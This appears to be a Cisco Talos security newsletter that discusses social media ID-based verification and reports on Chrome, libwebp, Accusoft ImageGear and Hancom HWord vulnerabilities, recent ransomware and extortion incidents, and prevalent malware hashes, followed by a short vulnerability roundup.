In the latest advancement in the alleged fight against bots, X recently launched a government ID-based authentication process available to its paid premium users. The social media platform is partnering with a third-party security company to provide advanced, faster support to make it more difficult for others to impersonate the user.

The setup process says it involves the user taking a picture with their computer’s camera with their government-issued ID. According to X’s Verification Policy, the third-party company only keeps the provided picture for as long as it takes to verify the provided information, and any ID images are only kept for 72 hours. The information derived from the submitted pictures is stored for 30 days by the third party in the name of providing users “an opportunity to appeal a verification decision and for X to review your appeal.”

Meta, Facebook and Instagram’s parent company, has been rolling out a similar program called Meta Verified that also asks users to submit photos of a government ID and pay a subscription fee to receive “account verification with impersonation protections and access to increased visibility and support.”

Taken at face value, X and Meta’s retention policies for these provided images of IDs seem fine. The main issue for me is I don’t really see what the concrete benefits here are.

On X, submitting the ID information and paying for the premium subscription only says it provides faster support, and an additional verification badge on a user’s account along with the now-infamous blue checkmark. The option is not available to business or organizational accounts, which seems like it’d be the space most ripe for impersonation — I’ve certainly observed my fair share of Talos-impersonated accounts on that platform where someone tried passing as our organization.

X is also saying it will only look into future benefits for this verification program, which “may explore additional measures, such as ensuring users have access to age-appropriate content and protecting against spam and malicious accounts.” The service still isn’t offered in the EU and U.K., either, presumably because of the stricter data privacy laws in those regions.

When these verification procedures are in place, there’s no guarantee they work, either. My sister-in-law had her Instagram/Meta account taken over by a cryptocurrency spammer last year, and even when she submitted a 360-degree selfie and images of her government-issued ID to Instagram, they denied her claim that her account was hacked, and to this day it’s still sending cryptocurrency spam to her family members even though she’s created a new account. Her appeal was not accepted by the company, either.

That’s one very specific case, I know, but if I’m going to start sending these companies with dubious security histories pictures of my driver’s license, I’m going to need a bit more than promises of future features and vague support promises before I’m sold on this method of multi-factor authentication.

**The one big thing**

Google Chrome users should update their browsers as soon as possible after the company disclosed multiple, serious vulnerabilities. Google initially disclosed CVE-2023-4863 as a heap buffer overflow in the WebP image format in Chrome. However, on Wednesday, it released a new advisory with CVE-2023-5129 identifying that the vulnerability actually existed in libwebp, meaning it affects multiple applications and not just Chrome. The updated advisory also elevated the severity score to a maximum 10 out of 10. This week, Talos also disclosed CVE-2023-3421, a use-after-free vulnerability that affects Chrome. An attacker could exploit this vulnerability by tricking the target into visiting a specially crafted HTML web page.

**Why do I care?**

Chrome is a very popular web browser, and its Chromium open-source version serves as the basis for many other browsing software. The fact that critical WebP vulnerability is particularly notable because WebP is the new default file format that most images use when  processed in Chrome. According to the advisory, “With a specially crafted WebP lossless file, libwebp may write data out of bounds to the heap,” if an attacker exploits CVE-2023-5129.

**So now what?**

The advice here is pretty simple — update your Google Chrome if you haven’t already!

**Top security headlines of the week**

**MGM casinos went back online last week after 10 days** due to a ransomware attack. The company’s casinos and hotels were able to fix all issues pertaining to guest services and the electronic slot machines that had been taken down due to the attack. One estimate suggests the outage may have cost the company upward of $80 million. The Scattered Spider threat actor is taking credit for the attack, partnering with known ransomware magnate ALPHV. Security researchers believe Scattered Spider is actually a hacking group that calls itself Star Fraud. New research presented at LABScon last week also stated that the group infiltrated MGM and Caesars, another casino manager, after gaining access to Okta authentication servers. (Washington Post, Associated Press)

**A hacking group claims to have breached “all of Sony \[SIC\] Systems”** and is reportedly selling stolen data on the dark web. A new group called Ransomed.vc is taking credit for the alleged attack and says it accessed more than 6,000 files from the tech giant known for producing the PlayStation video game console. Sony says it is still investigating the group’s claims. Despite the name, Ransomed.vc is actually an extortion group and does not have its own encryptor. Instead, it plans to sell the data on the dark web for $2.5 million. However, other threat actors have since stepped up to also take credit for the attack, leaving exact attribution in doubt. Another threat actor calling themselves MajorNelson says they “leaked for free" a 2.4 GB compressed archive that contains 3.14 GB of uncompressed data it claims belongs to Sony. (Bleeping Computer, Kotaku)

**A new ransomware-as-a-service syndicate ShadowSyndicate is reportedly operating a massive network of servers** that’s connected to other large ransomware families. Security researchers say the group has potential ties to the ALPHV ransomware group and other ransomware families like Clop, Play, Royal and Cactus. A new report outlines dozens of systems that ShadowSyndicate controls, including 52 containing the group’s secure shell (SSH) fingerprint it uses as Cobalt Strike beacons to manage and coordinate its various malware campaigns. It’s currently unclear if ShadowSyndicate is truly a ransomware-as-a-service group or more of an initial access broker. (DarkReading, SC Magazine)

**Can’t get enough Talos?**

*   Talos Takes Ep. #155: How Talos helped defend BlackHat's network in Vegas
*   Beers with Talos Ep. #139: Who is Jacques Wagon?
*   Decipher Security Podcast Source Code 9/22
*   ICS protocol coverage using Snort 3 service inspectors
*   10 new vulnerabilities disclosed by Talos, including use-after-free issue in Google Chrome

**Upcoming events where you can find Talos**

**Grace Hopper Celebration** **(Sept. 26 - 29)**

Orlando, Florida

> _Caitlin Huey, Susan Paskey and Alexis Merritt present a "Level Up Lab" titled "Don’t Fail Knowledge Checks: Accelerating Incident Response with Threat Intelligence." Participate in several fast-paced activities that emphasize the importance of threat intelligence in security incident investigations. Attendees will act as incident responders investigating a simulated incident that unfolds throughout this session. Periodic checkpoints will include discussions that highlight how incident response and threat intelligence complement each other during an active security investigation._

**ATT&CKcon 4.0** **(Oct. 24 - 25)**

McLean, Virginia

> _Nicole Hoffman and James Nutland discuss the MIRE ATT&CK framework in “One Leg to Stand on: Adventures in Adversary Tracking with ATT&CK.” Even though ATT&CK has become an industry standard for cyber threat intelligence reporting, all too often, techniques are thrown at the bottoms of reports and blogs without any context never to be seen again after dissemination. This is not useful for intelligence producers or consumers. In this presentation, Nicole and James will show analysts how to use ATT&CK as a guideline for creating a contextual knowledge base for adversary tracking._

**misecCON** **(Nov. 17)**

Lansing, Michigan

> _Terryn Valikodath from Talos Incident Response will deliver a talk providing advice on the best ways to conduct analysis, learning from his years of experience (and mishaps). He will speak about the everyday tasks he and his Talos IR teammates must go through to properly perform analysis. This talk covers topics such as planning, finding evil, recording findings, correlation and creating your own timelines._

**Most prevalent malware files from Talos telemetry over the past week**

**SHA 256:** e2cdf48bc6741afd7aba54d7c0b30401d2d6dd06138979ca73f3167915bf22b3  
**MD5:** eba4ad9540713d5956ab0b6a566c1487  
**Typical Filename:** webnavigatorbrowser.exe  
**Claimed Product:** WebNavigatorBrowser  
**Detection Name:** Win64:WebNav.26k0.rlsync.Talos

**SHA 256:** 0e2263d4f239a5c39960ffa6b6b688faa7fc3075e130fe0d4599d5b95ef20647  
**MD5:** bbcf7a68f4164a9f5f5cb2d9f30d9790  
**Typical Filename:** bbcf7a68f4164a9f5f5cb2d9f30d9790.vir  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Scar::1201

**SHA 256:** 7f66d4580871e3ee6a35c8fef6da7ab26a93ba36b80279625328aaf184435efa  
**MD5:** e9a6b1346d1a2447cabb980f3cc5dd27  
**Typical Filename:** профиль 10 класс.exe  
**Claimed Product:** N/A  
**Detection Name:** Application\_Blocker

**SHA 256:** a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91  
**MD5:** 7bdbd180c081fa63ca94f9c22c457376  
**Typical Filename:** c0dwjdi6a.dll  
**Claimed Product:** N/A  
**Detection Name:** Trojan.GenericKD.33515991

The security pitfalls of social media sites offering ID-based authentication

Talos disclosed 10 vulnerabilities over the past two weeks affecting a range of software, including the popular Google Chrome web browser.

Wednesday, September 27, 2023 12:09

Cisco Talos disclosed 10 vulnerabilities over the past two weeks affecting a range of software, including the popular Google Chrome web browser.

Attackers could exploit these vulnerabilities to carry out a variety of attacks, in some cases gaining the ability to execute remote code on the targeted machine.

Four of the vulnerabilities included in today’s Vulnerability Roundup that affect the Accusoft ImageGear development toolkit have a CVSS severity score of 9.8 out of a possible 10.

For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.

**Use-after-free vulnerability in Google Chrome web browser**

TALOS-2023-1751 (CVE-2023-3421) is a use-after-free vulnerability that affects the Google Chrome web browser. An attacker could exploit this vulnerability by tricking the target into visiting a specially crafted HTML web page.

The vulnerability arises when an adversary manipulates a specific function in Chrome to cause an out-of-bounds heap memory access, which could lead to a heap use-after-free or heap overflow.

**Multiple vulnerabilities in Accusoft ImageGear**

Talos researchers recently discovered eight vulnerabilities in Accusoft ImageGear, a document-imaging developer toolkit that allows users to convert, edit and create images.

Three of the vulnerabilities — TALOS-2023-1802 (CVE-2023-32653), TALOS-2023-1830 (CVE-2023-39453) and TALOS-2023-1760 (CVE-2023-35002) are heap-based buffer overflow vulnerabilities that could allow an attacker to execute arbitrary code on the targeted machine. Another issue, TALOS-2023-1836 (CVE-2023-40163), also has a critical severity score of 9.8 out of 10, but in this case, a specially crafted file could lead to memory corruption.

TALOS-2023-1729 (CVE-2023-23567) can also lead to arbitrary code execution, though this vulnerability is considered less severe. An attacker could also exploit this vulnerability by supplying the target with a malformed file.

There are three other vulnerabilities Talos discovered in this software that could cause a heap-based buffer overflow condition or memory corruption if the attacker sends a specially crafted file to the target.

*   TALOS-2023-1750 (CVE-2023-32284)
*   TALOS-2023-1742 (CVE-2023-28393)
*   TALOS-2023-1749 (CVE-2023-32614)

Hancom Office is one of the most popular software packages in South Korea, offering word processing and other services similar to Microsoft Office 365.

Talos discovered a use-after-free vulnerability in HWord, the package’s word processing software. TALOS-2023-1759 (CVE-2023-32541) can be manipulated in a way that will eventually allow the attacker to execute arbitrary code if they trick the target into opening a specially crafted, malicious .doc file.